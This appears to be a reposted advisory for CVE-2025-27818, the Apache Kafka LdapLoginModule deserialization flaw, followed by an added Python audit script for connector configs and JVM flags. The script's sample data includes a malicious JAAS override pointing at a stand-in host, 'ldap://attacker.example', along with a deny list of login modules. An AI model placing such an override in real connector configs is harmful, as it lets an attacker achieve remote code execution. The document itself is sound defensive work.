CVE-2025-27818 – Apache Kafka LdapLoginModule Deserialization Vulnerability

Source: https://afaghhosting.net/blog/cve-2025-27818-apache-kafka-ldaploginmodule-deserialization-vulnerability/
Posted: 2025-06-10 (category: vulnerability)

CVE ID : CVE-2025-27818

Published : June 10, 2025, 8:15 a.m.

Description : A possible security vulnerability has been identified in Apache Kafka.

Exploitation requires AlterConfig access to the cluster resource, or access to a Kafka Connect worker together with the ability to create or modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. This has been possible on Kafka clusters since Apache Kafka 2.0.0 (Kafka Connect 2.3.0).

When configuring the broker via its config file or an AlterConfig command, or a connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.LdapLoginModule". For a connector this is done through the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config` or `admin.override.sasl.jaas.config` properties. The server will then connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to trigger Java deserialization gadget chains on the Kafka Connect server. The attacker can thus cause unrestricted deserialization of untrusted data, or remote code execution when suitable gadgets are present on the classpath.

Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them.

Since Apache Kafka 3.9.1/4.0.0, a system property ("-Dorg.apache.kafka.disallowed.login.modules") has been added to disable the problematic login modules in SASL JAAS configuration. By default, "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule" are disabled in Apache Kafka Connect 3.9.1/4.0.0.

Kafka users are advised to validate connector configurations and only allow trusted LDAP configurations. Also examine connector dependencies for vulnerable versions; the remediation options are upgrading the connector, upgrading the specific dependency, or removing the connector. Finally, in addition to the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can implement their own connector client config override policy, which controls which Kafka client properties can be overridden directly in a connector config and which cannot.

Severity: 0.0 | NA (no CVSS score had been assigned when this was published)
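The advisory's two checks, validating connector configurations for the override keys it names and confirming the worker's JVM flag, as an added Python audit script that is not part of the advisory or of Apache Kafka. It assumes connector configs were fetched with `GET /connectors/{name}/config` and that the worker's JVM flags are available as the `KAFKA_OPTS` string; the connector names, connector class and LDAP host in the sample data are constructed.

```python
"""Offline audit of Kafka Connect connector configs and worker JVM flags for CVE-2025-27818.

Added example, not part of the advisory or of Apache Kafka. It assumes connector configs
were fetched with GET /connectors/{name}/config and that worker JVM flags are available as
the KAFKA_OPTS string; all sample data below is constructed.
"""
from __future__ import annotations

import re

# Login modules named by the advisory; Kafka Connect 3.9.1/4.0.0 disallow these by default.
DISALLOWED_LOGIN_MODULES = frozenset({
    "com.sun.security.auth.module.JndiLoginModule",
    "com.sun.security.auth.module.LdapLoginModule",
})

# Connector-level keys that override the JAAS config of the connector's Kafka clients.
JAAS_OVERRIDE_KEYS = (
    "producer.override.sasl.jaas.config",
    "consumer.override.sasl.jaas.config",
    "admin.override.sasl.jaas.config",
)

# A JAAS entry is "<LoginModuleClass> <controlFlag> [option=value ...];" - capture the class.
_JAAS_ENTRY_RE = re.compile(
    r"([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*)\s+(?:required|requisite|sufficient|optional)\b",
    re.IGNORECASE,
)

_DISALLOWED_FLAG_RE = re.compile(r"-Dorg\.apache\.kafka\.disallowed\.login\.modules=(\S*)")


def login_modules_in(jaas_config: str) -> list[str]:
    """Return every login module class named in a JAAS config string (Kafka expects one)."""
    return _JAAS_ENTRY_RE.findall(jaas_config)


def audit_connector(name: str, config: dict) -> list[dict]:
    """Flag override keys that point a connector's clients at a disallowed or unparseable login module."""
    findings = []
    for key in JAAS_OVERRIDE_KEYS:
        value = config.get(key)
        if value is None:
            continue
        modules = login_modules_in(value)
        if not modules:
            # Fail closed: a JAAS string we cannot parse is not one we can vouch for.
            findings.append({"connector": name, "key": key, "module": None,
                             "reason": "unparseable JAAS config"})
        for module in modules:
            if module in DISALLOWED_LOGIN_MODULES:
                findings.append({"connector": name, "key": key, "module": module,
                                 "reason": "disallowed login module"})
    return findings


def audit_all(configs: dict[str, dict]) -> list[dict]:
    """Audit a mapping of connector name -> config (the shape of GET /connectors/{name}/config)."""
    findings = []
    for name, config in configs.items():
        findings.extend(audit_connector(name, config))
    return findings


def disallowed_modules_from_jvm_opts(jvm_opts: str) -> set[str]:
    """Parse the comma-separated -Dorg.apache.kafka.disallowed.login.modules value from a KAFKA_OPTS string."""
    m = _DISALLOWED_FLAG_RE.search(jvm_opts)
    if not m:
        return set()
    return {x.strip() for x in m.group(1).split(",") if x.strip()}


def worker_hardened(jvm_opts: str) -> bool:
    """True when the JVM flag disables at least both modules the advisory names."""
    return DISALLOWED_LOGIN_MODULES <= disallowed_modules_from_jvm_opts(jvm_opts)


# Constructed sample input: connector names, the connector class and the LDAP host are made up.
SAMPLE_CONNECTOR_CONFIGS = {
    "orders-sink": {
        "connector.class": "io.example.EchoSinkConnector",
        "topics": "orders",
        "producer.override.sasl.jaas.config":
            'org.apache.kafka.common.security.plain.PlainLoginModule required '
            'username="svc-orders" password="s3cr3t";',
    },
    "rogue-sink": {
        "connector.class": "io.example.EchoSinkConnector",
        "topics": "orders",
        # The pattern the advisory describes: a client's JAAS config pointed at LdapLoginModule
        # with a userProvider URL under the attacker's control.
        "producer.override.sasl.jaas.config":
            'com.sun.security.auth.module.LdapLoginModule required '
            'userProvider="ldap://attacker.example:1389/ou=people,dc=example" '
            'userFilter="(uid={USERNAME})" authIdentity="{USERNAME}";',
        "admin.override.sasl.jaas.config":
            'com.sun.security.auth.module.JndiLoginModule required;',
    },
}

SAMPLE_KAFKA_OPTS = ("-Xmx1g -Dorg.apache.kafka.disallowed.login.modules="
                     "com.sun.security.auth.module.JndiLoginModule,"
                     "com.sun.security.auth.module.LdapLoginModule")


if __name__ == "__main__":
    for f in audit_all(SAMPLE_CONNECTOR_CONFIGS):
        print(f"[FINDING] {f['connector']}: {f['key']} -> {f['module']} ({f['reason']})")
    print("worker JVM flag covers both advisory modules:", worker_hardened(SAMPLE_KAFKA_OPTS))
```

The audit is a point-in-time check, not an enforcement mechanism: a connector config that passes today can be altered through the REST API tomorrow, so on workers older than 3.9.1/4.0.0 the durable fixes remain the JVM flag and a connector client config override policy that refuses `*.override.sasl.jaas.config` outright. The `DISALLOWED_LOGIN_MODULES` set is the advisory's default list and can be extended to any login module your environment does not trust.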